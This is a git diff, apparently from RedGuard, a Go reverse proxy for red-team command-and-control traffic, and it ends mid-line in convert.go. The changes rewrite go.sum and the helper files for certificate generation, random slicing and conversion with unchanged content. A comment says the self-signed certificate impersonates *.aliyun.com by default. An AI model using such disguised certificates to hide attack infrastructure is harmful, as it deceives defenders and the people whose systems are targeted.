github.com/phachon/go-logger v0.0.0-20191215032019-86e4227f71ea => github.com/wikiZ/go-logger v0.0.0-20201128041628-4404a90d93ec diff --git a/go.sum b/go.sum index b8d2c6c..6128d27 100644 --- a/go.sum +++ b/go.sum @@ -1,69 +1,69 @@ -github.com/D00Movenok/goMalleable v0.0.0-20220314191301-14f91f43c3b0 h1:J2/ncp0Jfq6GAws9YNvL0DxG+DnmPxIJkZ0u01y14uY= -github.com/D00Movenok/goMalleable v0.0.0-20220314191301-14f91f43c3b0/go.mod h1:FTxb8RmunucvVgT4QCa0SM1AKYkqIsVH+Z5+zkuHWU4= -github.com/alecthomas/kong v0.3.0/go.mod h1:uzxf/HUh0tj43x1AyJROl3JT7SgsZ5m+icOv1csRhc0= -github.com/alecthomas/participle/v2 v2.0.0-alpha7 h1:cK4vjj0VSgb3lN1nuKA5F7dw+1s1pWBe5bx7nNCnN+c= -github.com/alecthomas/participle/v2 v2.0.0-alpha7/go.mod h1:NumScqsC42o9x+dGj8/YqsIfhrIQjFEOFovxotbBirA= -github.com/alecthomas/repr v0.0.0-20181024024818-d37bc2a10ba1/go.mod h1:xTS7Pm1pD1mvyM075QCDSRqH6qRLXylzS24ZTpRiSzQ= -github.com/alecthomas/repr v0.0.0-20210801044451-80ca428c5142/go.mod h1:2kn6fqh/zIyPLmm3ugklbEi5hg5wS435eygvNfaDQL8= -github.com/alecthomas/repr v0.0.0-20220113201626-b1b626ac65ae h1:zzGwJfFlFGD94CyyYwCJeSuD32Gj9GTaSi5y9hoVzdY= -github.com/alecthomas/repr v0.0.0-20220113201626-b1b626ac65ae/go.mod h1:2kn6fqh/zIyPLmm3ugklbEi5hg5wS435eygvNfaDQL8= -github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 h1:OYA+5W64v3OgClL+IrOD63t4i/RW7RqrAVl9LTZ9UqQ= -github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394/go.mod h1:Q8n74mJTIgjX4RBBcHnJ05h//6/k6foqmgE45jTQtxg= -github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= -github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= -github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= -github.com/fatih/color v1.7.0 h1:DkWD4oS2D8LGGgTQ6IvwJJXSL5Vp2ffcQg58nFV38Ys= -github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4= -github.com/go-ini/ini v1.66.4 h1:dKjMqkcbkzfddhIhyglTPgMoJnkvmG+bSLrU9cTHc5M= -github.com/go-ini/ini v1.66.4/go.mod h1:ByCAeIL28uOIIG0E3PJtZPDL8WnHpFKFOtgjp+3Ies8= -github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY= -github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I= -github.com/mailru/easyjson v0.7.0 h1:aizVhC/NAAcKWb+5QsU1iNOZb4Yws5UO2I+aIprQITM= -github.com/mailru/easyjson v0.7.0/go.mod h1:KAzv3t3aY1NaHWoQz1+4F1ccyAH66Jk7yos7ldAVICs= -github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA= -github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= -github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= -github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM= -github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= -github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= -github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= -github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= -github.com/sleeyax/ja3rp v0.0.1 h1:axAQaWfz+YWTrE0kGAHNJXj730cLFV6ZRASPkR//76U= -github.com/sleeyax/ja3rp v0.0.1/go.mod h1:LoKchsq6bTZIEeHoiSIARqr9TerxxOAM7OHk67Rz9oY= -github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= -github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= -github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= -github.com/stretchr/testify v1.7.1 h1:5TQK59W5E3v0r2duFAb7P95B6hEeOyEnHRa8MjYSMTY= -github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= -github.com/tidwall/gjson v1.14.1 h1:iymTbGkQBhveq21bEvAQ81I0LEBork8BFe1CUZXdyuo= -github.com/tidwall/gjson v1.14.1/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= -github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA= -github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM= -github.com/tidwall/pretty v1.2.0 h1:RWIZEg2iJ8/g6fDDYzMpobmaoGh5OLl4AXtGUGPcqCs= -github.com/tidwall/pretty v1.2.0/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= -github.com/wikiZ/go-logger v0.0.0-20201128041628-4404a90d93ec h1:soPPf+s+iq4J5qFk0KziWKA6jO29bxonQe1yqNQkeic= -github.com/wikiZ/go-logger v0.0.0-20201128041628-4404a90d93ec/go.mod h1:WBIWFH/iYYvuApCvPU+/R6hfX6v0Ogu4apwf0UgzVF0= -github.com/wxnacy/wgo v1.0.4 h1:UEkzjlW3pMAXcTUCgMekrCvFYLKKwc0p5GAQrMIphs8= -github.com/wxnacy/wgo v1.0.4/go.mod h1:8hqUwCgvMGgAIr4MLIeFur2YXS/Ns3vbyx5abx0e8iM= -golang.org/x/crypto v0.0.0-20211117183948-ae814b36b871 h1:/pEO3GD/ABYAjuakUS6xSEmmlyVS4kxBNkeA9tLJiTI= -golang.org/x/crypto v0.0.0-20211117183948-ae814b36b871/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= -golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= -golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= -golang.org/x/net v0.0.0-20211123203042-d83791d6bcd9 h1:0qxwC5n+ttVOINCBeRHO0nq9X7uy8SDsPoi5OaCdIEI= -golang.org/x/net v0.0.0-20211123203042-d83791d6bcd9/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= -golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1 h1:SrN+KX8Art/Sf4HNj6Zcz06G7VEz+7w9tdXTPOZ7+l4= -golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= -golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= -golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= -golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= -golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= -gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= -gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= -gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= -gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= -gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= -gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +github.com/D00Movenok/goMalleable v0.0.0-20220314191301-14f91f43c3b0 h1:J2/ncp0Jfq6GAws9YNvL0DxG+DnmPxIJkZ0u01y14uY= +github.com/D00Movenok/goMalleable v0.0.0-20220314191301-14f91f43c3b0/go.mod h1:FTxb8RmunucvVgT4QCa0SM1AKYkqIsVH+Z5+zkuHWU4= +github.com/alecthomas/kong v0.3.0/go.mod h1:uzxf/HUh0tj43x1AyJROl3JT7SgsZ5m+icOv1csRhc0= +github.com/alecthomas/participle/v2 v2.0.0-alpha7 h1:cK4vjj0VSgb3lN1nuKA5F7dw+1s1pWBe5bx7nNCnN+c= +github.com/alecthomas/participle/v2 v2.0.0-alpha7/go.mod h1:NumScqsC42o9x+dGj8/YqsIfhrIQjFEOFovxotbBirA= +github.com/alecthomas/repr v0.0.0-20181024024818-d37bc2a10ba1/go.mod h1:xTS7Pm1pD1mvyM075QCDSRqH6qRLXylzS24ZTpRiSzQ= +github.com/alecthomas/repr v0.0.0-20210801044451-80ca428c5142/go.mod h1:2kn6fqh/zIyPLmm3ugklbEi5hg5wS435eygvNfaDQL8= +github.com/alecthomas/repr v0.0.0-20220113201626-b1b626ac65ae h1:zzGwJfFlFGD94CyyYwCJeSuD32Gj9GTaSi5y9hoVzdY= +github.com/alecthomas/repr v0.0.0-20220113201626-b1b626ac65ae/go.mod h1:2kn6fqh/zIyPLmm3ugklbEi5hg5wS435eygvNfaDQL8= +github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 h1:OYA+5W64v3OgClL+IrOD63t4i/RW7RqrAVl9LTZ9UqQ= +github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394/go.mod h1:Q8n74mJTIgjX4RBBcHnJ05h//6/k6foqmgE45jTQtxg= +github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= +github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/fatih/color v1.7.0 h1:DkWD4oS2D8LGGgTQ6IvwJJXSL5Vp2ffcQg58nFV38Ys= +github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4= +github.com/go-ini/ini v1.66.4 h1:dKjMqkcbkzfddhIhyglTPgMoJnkvmG+bSLrU9cTHc5M= +github.com/go-ini/ini v1.66.4/go.mod h1:ByCAeIL28uOIIG0E3PJtZPDL8WnHpFKFOtgjp+3Ies8= +github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY= +github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I= +github.com/mailru/easyjson v0.7.0 h1:aizVhC/NAAcKWb+5QsU1iNOZb4Yws5UO2I+aIprQITM= +github.com/mailru/easyjson v0.7.0/go.mod h1:KAzv3t3aY1NaHWoQz1+4F1ccyAH66Jk7yos7ldAVICs= +github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA= +github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= +github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= +github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM= +github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= +github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= +github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/sleeyax/ja3rp v0.0.1 h1:axAQaWfz+YWTrE0kGAHNJXj730cLFV6ZRASPkR//76U= +github.com/sleeyax/ja3rp v0.0.1/go.mod h1:LoKchsq6bTZIEeHoiSIARqr9TerxxOAM7OHk67Rz9oY= +github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= +github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/stretchr/testify v1.7.1 h1:5TQK59W5E3v0r2duFAb7P95B6hEeOyEnHRa8MjYSMTY= +github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/tidwall/gjson v1.14.1 h1:iymTbGkQBhveq21bEvAQ81I0LEBork8BFe1CUZXdyuo= +github.com/tidwall/gjson v1.14.1/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= +github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA= +github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM= +github.com/tidwall/pretty v1.2.0 h1:RWIZEg2iJ8/g6fDDYzMpobmaoGh5OLl4AXtGUGPcqCs= +github.com/tidwall/pretty v1.2.0/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= +github.com/wikiZ/go-logger v0.0.0-20201128041628-4404a90d93ec h1:soPPf+s+iq4J5qFk0KziWKA6jO29bxonQe1yqNQkeic= +github.com/wikiZ/go-logger v0.0.0-20201128041628-4404a90d93ec/go.mod h1:WBIWFH/iYYvuApCvPU+/R6hfX6v0Ogu4apwf0UgzVF0= +github.com/wxnacy/wgo v1.0.4 h1:UEkzjlW3pMAXcTUCgMekrCvFYLKKwc0p5GAQrMIphs8= +github.com/wxnacy/wgo v1.0.4/go.mod h1:8hqUwCgvMGgAIr4MLIeFur2YXS/Ns3vbyx5abx0e8iM= +golang.org/x/crypto v0.0.0-20211117183948-ae814b36b871 h1:/pEO3GD/ABYAjuakUS6xSEmmlyVS4kxBNkeA9tLJiTI= +golang.org/x/crypto v0.0.0-20211117183948-ae814b36b871/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= +golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20211123203042-d83791d6bcd9 h1:0qxwC5n+ttVOINCBeRHO0nq9X7uy8SDsPoi5OaCdIEI= +golang.org/x/net v0.0.0-20211123203042-d83791d6bcd9/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1 h1:SrN+KX8Art/Sf4HNj6Zcz06G7VEz+7w9tdXTPOZ7+l4= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= +golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= +gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= diff --git a/lib/CreateSSL.go b/lib/CreateSSL.go index 9346b86..94b7c58 100644 --- a/lib/CreateSSL.go +++ b/lib/CreateSSL.go @@ -1,113 +1,113 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: CreateSSL.go - * @Time: 2022/5/8 12:51 - **/ - -package lib - -import ( - "crypto/rand" - "crypto/rsa" - "crypto/x509" - "crypto/x509/pkix" - "encoding/pem" - "math/big" - "os" - "strings" - "time" - - "RedGuard/core/parameter" -) - -// GenerateSelfSignedCert Generate a self-signed CA certificate -// @param cert *parameter.Cert Certificate Configuration -// NOTE: The *.aliyun.com certificate is used by default. -// You can customize the certificate information by initializing the configuration file -// By default, the certificate is stored in the cert-RSA directory in the tool directory -func GenerateSelfSignedCert(cert *parameter.Cert) { - priv, err := rsa.GenerateKey(rand.Reader, 2048) // Generating a key pair - if err != nil { - panic(err) - } - // Creating a Certificate Template - template := x509.Certificate{ - SerialNumber: big.NewInt(time.Now().UnixNano()), // CA Certificate Serial number - // Issuer information, same as consumer information - Issuer: pkix.Name{}, - // Consumer certificate Information - Subject: pkix.Name{ - CommonName: cert.CommonName, // Cert CommonName - Locality: []string{cert.Locality}, // Cert Locality - Organization: []string{cert.Organization}, // Cert Organization - Country: []string{cert.Country}, // Cert Country - }, - // Start time of validity - NotBefore: time.Now(), - NotAfter: time.Now().Add(time.Hour * 24 * 365), // failure time - // Indicates that the certificate is used for server authentication - KeyUsage: x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign, - ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}, - } - // User Optional name - template.DNSNames = append(template.DNSNames, cert.DNSName...) - // Create a certificate, where the second parameter is the same - // the third parameter means that the certificate is self-certificate. - // return value is DER encoded certificate - certificate, err := x509.CreateCertificate( - rand.Reader, - &template, - &template, - &priv.PublicKey, - priv, - ) - if err != nil { - panic(err) - } - // Place the resulting certificate into the pem.Block structure - block := pem.Block{ - Type: "CERTIFICATE", - Headers: nil, - Bytes: certificate, - } - // Encoded by PEM and written to disk files - file, _ := os.Create("cert-rsa/ca.crt") - defer func(file *os.File) { - _ = file.Close() - }(file) - _ = pem.Encode(file, &block) - // Put the key pair from the private key into the pem.Block structure - block = pem.Block{ - Type: "RSA PRIVATE KEY", - Headers: nil, - Bytes: x509.MarshalPKCS1PrivateKey(priv), - } - // Encoded by PEM and written to disk files - file, _ = os.Create("cert-rsa/ca.key") - _ = pem.Encode(file, &block) -} - -func InitGenerateSelfSignedCert() { - // Check whether an SSL certificate is generated - if _existsCrt, _ := FileExists("cert-rsa/ca.crt"); _existsCrt { - if _existsKey, _ := FileExists("cert-rsa/ca.key"); _existsKey { - return - } - } - // Example Create a CA certificate storage directory - if _, err := os.Stat("cert-rsa"); err != nil { - _ = os.Mkdir("cert-rsa", 0766) // Directory permissions - } - var cert parameter.Cert - cfg := InitConfig() // init config file object - // Get the information in the configuration file - cert.CommonName = ReadConfig(`cert`, `CommonName`, cfg) - cert.Locality = ReadConfig(`cert`, `Locality`, cfg) - cert.Organization = ReadConfig(`cert`, `Organization`, cfg) - cert.DNSName = strings.Split(ReadConfig(`cert`, `DNSName`, cfg), `,`) - cert.Country = ReadConfig(`cert`, `Country`, cfg) - // Generate a self-signed certificate method - GenerateSelfSignedCert(&cert) - logger.Critical("A default SSL certificate is being generated for the reverse proxy...") -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: CreateSSL.go + * @Time: 2022/5/8 12:51 + **/ + +package lib + +import ( + "crypto/rand" + "crypto/rsa" + "crypto/x509" + "crypto/x509/pkix" + "encoding/pem" + "math/big" + "os" + "strings" + "time" + + "RedGuard/core/parameter" +) + +// GenerateSelfSignedCert Generate a self-signed CA certificate +// @param cert *parameter.Cert Certificate Configuration +// NOTE: The *.aliyun.com certificate is used by default. +// You can customize the certificate information by initializing the configuration file +// By default, the certificate is stored in the cert-RSA directory in the tool directory +func GenerateSelfSignedCert(cert *parameter.Cert) { + priv, err := rsa.GenerateKey(rand.Reader, 2048) // Generating a key pair + if err != nil { + panic(err) + } + // Creating a Certificate Template + template := x509.Certificate{ + SerialNumber: big.NewInt(time.Now().UnixNano()), // CA Certificate Serial number + // Issuer information, same as consumer information + Issuer: pkix.Name{}, + // Consumer certificate Information + Subject: pkix.Name{ + CommonName: cert.CommonName, // Cert CommonName + Locality: []string{cert.Locality}, // Cert Locality + Organization: []string{cert.Organization}, // Cert Organization + Country: []string{cert.Country}, // Cert Country + }, + // Start time of validity + NotBefore: time.Now(), + NotAfter: time.Now().Add(time.Hour * 24 * 365), // failure time + // Indicates that the certificate is used for server authentication + KeyUsage: x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign, + ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}, + } + // User Optional name + template.DNSNames = append(template.DNSNames, cert.DNSName...) + // Create a certificate, where the second parameter is the same + // the third parameter means that the certificate is self-certificate. + // return value is DER encoded certificate + certificate, err := x509.CreateCertificate( + rand.Reader, + &template, + &template, + &priv.PublicKey, + priv, + ) + if err != nil { + panic(err) + } + // Place the resulting certificate into the pem.Block structure + block := pem.Block{ + Type: "CERTIFICATE", + Headers: nil, + Bytes: certificate, + } + // Encoded by PEM and written to disk files + file, _ := os.Create("cert-rsa/ca.crt") + defer func(file *os.File) { + _ = file.Close() + }(file) + _ = pem.Encode(file, &block) + // Put the key pair from the private key into the pem.Block structure + block = pem.Block{ + Type: "RSA PRIVATE KEY", + Headers: nil, + Bytes: x509.MarshalPKCS1PrivateKey(priv), + } + // Encoded by PEM and written to disk files + file, _ = os.Create("cert-rsa/ca.key") + _ = pem.Encode(file, &block) +} + +func InitGenerateSelfSignedCert() { + // Check whether an SSL certificate is generated + if _existsCrt, _ := FileExists("cert-rsa/ca.crt"); _existsCrt { + if _existsKey, _ := FileExists("cert-rsa/ca.key"); _existsKey { + return + } + } + // Example Create a CA certificate storage directory + if _, err := os.Stat("cert-rsa"); err != nil { + _ = os.Mkdir("cert-rsa", 0766) // Directory permissions + } + var cert parameter.Cert + cfg := InitConfig() // init config file object + // Get the information in the configuration file + cert.CommonName = ReadConfig(`cert`, `CommonName`, cfg) + cert.Locality = ReadConfig(`cert`, `Locality`, cfg) + cert.Organization = ReadConfig(`cert`, `Organization`, cfg) + cert.DNSName = strings.Split(ReadConfig(`cert`, `DNSName`, cfg), `,`) + cert.Country = ReadConfig(`cert`, `Country`, cfg) + // Generate a self-signed certificate method + GenerateSelfSignedCert(&cert) + logger.Critical("A default SSL certificate is being generated for the reverse proxy...") +} diff --git a/lib/MicsSlice.go b/lib/MicsSlice.go index 328f180..72699b8 100644 --- a/lib/MicsSlice.go +++ b/lib/MicsSlice.go @@ -1,34 +1,34 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: MicsSlice.go - * @Time: 2022/5/26 13:54 - **/ - -package lib - -import ( - "math/rand" - "time" -) - -// MicsSlice Returns a random element of the specified array -// @param origin []int16 Gets an array of values -// @param count int Gets the number of random elements -func MicsSlice(origin []uint16, count int) []uint16 { - tmpOrigin := make([]uint16, len(origin)) - copy(tmpOrigin, origin) - rand.Seed(time.Now().Unix()) - rand.Shuffle(len(tmpOrigin), func(i int, j int) { - tmpOrigin[i], tmpOrigin[j] = tmpOrigin[j], tmpOrigin[i] - }) - - result := make([]uint16, 0, count) - for index, value := range tmpOrigin { - if index == count { - break - } - result = append(result, value) - } - return result -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: MicsSlice.go + * @Time: 2022/5/26 13:54 + **/ + +package lib + +import ( + "math/rand" + "time" +) + +// MicsSlice Returns a random element of the specified array +// @param origin []int16 Gets an array of values +// @param count int Gets the number of random elements +func MicsSlice(origin []uint16, count int) []uint16 { + tmpOrigin := make([]uint16, len(origin)) + copy(tmpOrigin, origin) + rand.Seed(time.Now().Unix()) + rand.Shuffle(len(tmpOrigin), func(i int, j int) { + tmpOrigin[i], tmpOrigin[j] = tmpOrigin[j], tmpOrigin[i] + }) + + result := make([]uint16, 0, count) + for index, value := range tmpOrigin { + if index == count { + break + } + result = append(result, value) + } + return result +} diff --git a/lib/convert.go b/lib/convert.go index 32c4b59..f982778 100644 --- a/lib/convert.go +++ b/lib/convert.go @@ -1,59 +1,59 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: convert.go - * @Time: 2022/5/9 12:24 - **/ - -package lib - -import ( - "crypto/md5" - "encoding/hex" - "encoding/json" - "os" - "regexp" -) - -// JsonToMap Convert json string to map -func JsonToMap(jsonStr string) map[string]string { - mapper := make(map[string]string) - err := json.Unmarshal([]byte(jsonStr), &mapper) - if err != nil { - return nil - } - return mapper -} - -// ConvertIP Find IP Address -func ConvertIP(ip string) string { - reg, _ := regexp.Compile(`\d+\.\d+\.\d+\.\d+`) - return string(reg.Find([]byte(ip))) -} - -// EncodeMD5 Convert string to md5 -func EncodeMD5(s string) string { - hash := md5.New() - hash.Write([]byte(s)) - md5Str := hex.EncodeToString(hash.Sum(nil)) - return md5Str -} - -// CheckIP Check whether the entered IP address is valid -func CheckIP(ip string) bool { - if m, _ := 